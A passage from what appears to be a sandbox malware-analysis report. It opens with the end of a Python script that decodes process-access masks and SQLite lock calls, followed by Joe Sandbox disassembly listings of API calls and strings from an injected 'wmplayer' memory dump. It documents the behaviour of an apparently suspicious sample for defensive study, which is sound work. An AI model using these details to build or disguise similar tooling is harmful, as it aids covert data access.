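    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}

# Assumed SQLite default: the Win32 VFS locks one byte at this offset.
SQLITE_PENDING_BYTE = 0x40000000
SQLITE_SUFFIXES = ("-journal", "-wal")


def _atom(tok):
    """Turn an 8-digit hex argument into an int; keep '?' and strings as-is."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{1,8}", tok) else tok


def decode_process_access(mask):
    """Return the named rights set in an OpenProcess desired-access mask."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def triage(listing):
    """Return (ref, finding) pairs for the security-relevant calls and strings."""
    findings = []
    for line in listing.splitlines():
        call = _CALL_RE.match(line)
        if call:
            api, ref = call["api"], call["ref"]
            args = [_atom(a) for a in call["args"].split(",")] if call["args"] else []
            if api == "OpenProcess" and args and isinstance(args[0], int):
                findings.append((ref, "OpenProcess access " + "|".join(decode_process_access(args[0]))))
            elif (api in ("LockFile", "UnlockFile") and len(args) >= 4
                  and args[1] == SQLITE_PENDING_BYTE and args[3] == 1):
                findings.append((ref, f"{api} on SQLite PENDING_BYTE: embedded SQLite VFS lock"))
            elif api == "memcpy" and any(a in SQLITE_SUFFIXES for a in args):
                findings.append((ref, "builds SQLite side-file name (-journal/-wal)"))
            continue
        text = _STR_RE.match(line)
        if text and "attach" in text["text"].lower():
            findings.append((text["ref"], "SQLite ATTACH error string"))
    return findings


if __name__ == "__main__":
    for ref, finding in triage(SAMPLE):
        print(ref, finding)
```

Run as-is it lists seven findings from the excerpt; paste any other block of this report's API lines into SAMPLE to get the same decoding. The access-mask decoder deliberately keeps unknown bits as a hex remainder rather than dropping them, so a mask that includes rights outside the table is still visible in the output.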
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3975816621-0
                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                            • String ID:
                                                                                            • API String ID: 4218492932-0
                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                            APIs
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscat
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 384018552-4153097237
                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2029023288-3849865405
                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                            APIs
                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                            • memset.MSVCRT ref: 00405455
                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                            • memset.MSVCRT ref: 00405483
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                            • String ID: 6$\
                                                                                            • API String ID: 404372293-1284684873
                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1331804452-0
                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                            APIs
                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: advapi32.dll
                                                                                            • API String ID: 2012295524-4050573280
                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                            Strings
                                                                                            • <%s>, xrefs: 004100A6
                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                            • API String ID: 3473751417-2880344631
                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2521778956-791839006
                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscpy
                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                            • API String ID: 999028693-502967061
                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 4131475296-0
                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2618321458-3614832568
                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFilefreememset
                                                                                            • String ID:
                                                                                            • API String ID: 2507021081-0
                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                            • free.MSVCRT ref: 00417544
                                                                                            • free.MSVCRT ref: 00417562
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4131324427-0
                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                            • free.MSVCRT ref: 0041822B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$free
                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                            • API String ID: 924794160-1420421710
                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0041477F
                                                                                            • wcscpy.MSVCRT ref: 0041479A
                                                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                                                            • String ID: General
                                                                                            • API String ID: 999786162-26480598
                                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                            • String ID: Error$Error %d: %s
                                                                                            • API String ID: 313946961-1552265934
                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
